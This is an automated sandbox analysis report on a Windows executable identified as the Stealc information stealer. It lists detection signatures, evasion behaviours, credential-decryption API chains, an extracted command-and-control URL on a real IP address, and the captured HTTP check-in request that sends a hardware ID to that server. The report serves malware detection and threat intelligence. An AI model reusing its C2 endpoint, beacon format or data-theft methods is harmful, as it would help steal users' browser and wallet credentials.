Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1561767
MD5:25fa991e349149a46f237995246dcac2
SHA1:581f619ac0a4f4f6e995e14a419b3a5d5e50bbcf
SHA256:6a076f8ee05524ec960150149ced7df5c5953f6fe04de4fada9c5d3439552eb5
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 3992 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 25FA991E349149A46F237995246DCAC2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2220139315.0000000001018000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.2132739933.0000000004C80000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 3992JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 3992JoeSecurity_StealcYara detected StealcJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-24T08:46:06.690752+010020442431Malware Command and Control Activity Detected192.168.2.649708185.215.113.20680TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: file.exeAvira: detected
              Antivirus detection for URL or domain
              Source: http://185.215.113.206/c4becf79229cb002.phps0_Avira URL Cloud: Label: malware
              Source: http://185.215.113.206/c4becf79229cb002.phpk1GAvira URL Cloud: Label: malware
              Source: http://185.215.113.206/c4becf79229cb002.phpC0oAvira URL Cloud: Label: malware
              Found malware configuration
              Source: file.exe.3992.0.memstrminMalware Configuration Extractor: StealC {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
              Multi AV Scanner detection for submitted file
              Source: file.exeReversingLabs: Detection: 42%
              Source: file.exeVirustotal: Detection: 49%Perma Link
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: file.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D4C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_006D4C50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D60D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_006D60D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F40B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_006F40B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E6960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_006E6960
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DEA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,0_2_006DEA30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E6B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_006E6B79
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D9B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_006D9B20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D9B80 CryptUnprotectData,LocalAlloc,LocalFree,0_2_006D9B80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D7750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_006D7750
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_006E18A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_006E3910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_006E1269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_006E1250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006EE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_006EE210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_006E4B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_006E4B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006ECBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_006ECBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_006E23A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DDB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_006DDB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DDB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_006DDB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_006E2390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006ED530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_006ED530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006EDD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_006EDD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_006D16A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_006D16B9

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49708 -> 185.215.113.206:80
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: 185.215.113.206/c4becf79229cb002.php
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJDGDBFCBKFHJKFHCBKHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 44 47 44 42 46 43 42 4b 46 48 4a 4b 46 48 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 37 33 30 46 32 42 37 37 44 38 43 31 37 33 30 36 37 37 36 35 32 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 44 47 44 42 46 43 42 4b 46 48 4a 4b 46 48 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 44 47 44 42 46 43 42 4b 46 48 4a 4b 46 48 43 42 4b 2d 2d 0d 0a Data Ascii: ------GHJDGDBFCBKFHJKFHCBKContent-Disposition: form-data; name="hwid"F730F2B77D8C1730677652------GHJDGDBFCBKFHJKFHCBKContent-Disposition: form-data; name="build"mars------GHJDGDBFCBKFHJKFHCBK--
              Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
              Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D6C40 lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,lstrcpy,0_2_006D6C40
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: unknownHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJDGDBFCBKFHJKFHCBKHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 44 47 44 42 46 43 42 4b 46 48 4a 4b 46 48 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 37 33 30 46 32 42 37 37 44 38 43 31 37 33 30 36 37 37 36 35 32 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 44 47 44 42 46 43 42 4b 46 48 4a 4b 46 48 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 44 47 44 42 46 43 42 4b 46 48 4a 4b 46 48 43 42 4b 2d 2d 0d 0a Data Ascii: ------GHJDGDBFCBKFHJKFHCBKContent-Disposition: form-data; name="hwid"F730F2B77D8C1730677652------GHJDGDBFCBKFHJKFHCBKContent-Disposition: form-data; name="build"mars------GHJDGDBFCBKFHJKFHCBK--
              Source: file.exe, 00000000.00000002.2220139315.0000000000FFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
              Source: file.exe, 00000000.00000002.2220139315.0000000000FFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206-
              Source: file.exe, 00000000.00000002.2220139315.000000000105A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2220139315.0000000001039000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
              Source: file.exe, 00000000.00000002.2220139315.0000000001039000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/0
              Source: file.exe, 00000000.00000002.2220139315.000000000105A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2220139315.0000000001018000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2220139315.0000000001045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
              Source: file.exe, 00000000.00000002.2220139315.000000000105A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
              Source: file.exe, 00000000.00000002.2220139315.000000000105A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpC0o
              Source: file.exe, 00000000.00000002.2220139315.000000000105A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpk1G
              Source: file.exe, 00000000.00000002.2220139315.000000000105A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phps0_
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D9770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,Sleep,CloseDesktop,0_2_006D9770

              System Summary

              barindex
              PE file contains section with special chars
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F48B00_2_006F48B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A2B9A60_2_00A2B9A6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A9799B0_2_00A9799B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6F18D0_2_00D6F18D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AAA96A0_2_00AAA96A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A9A2020_2_00A9A202
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A902190_2_00A90219
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00934A450_2_00934A45
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A9F31E0_2_00A9F31E
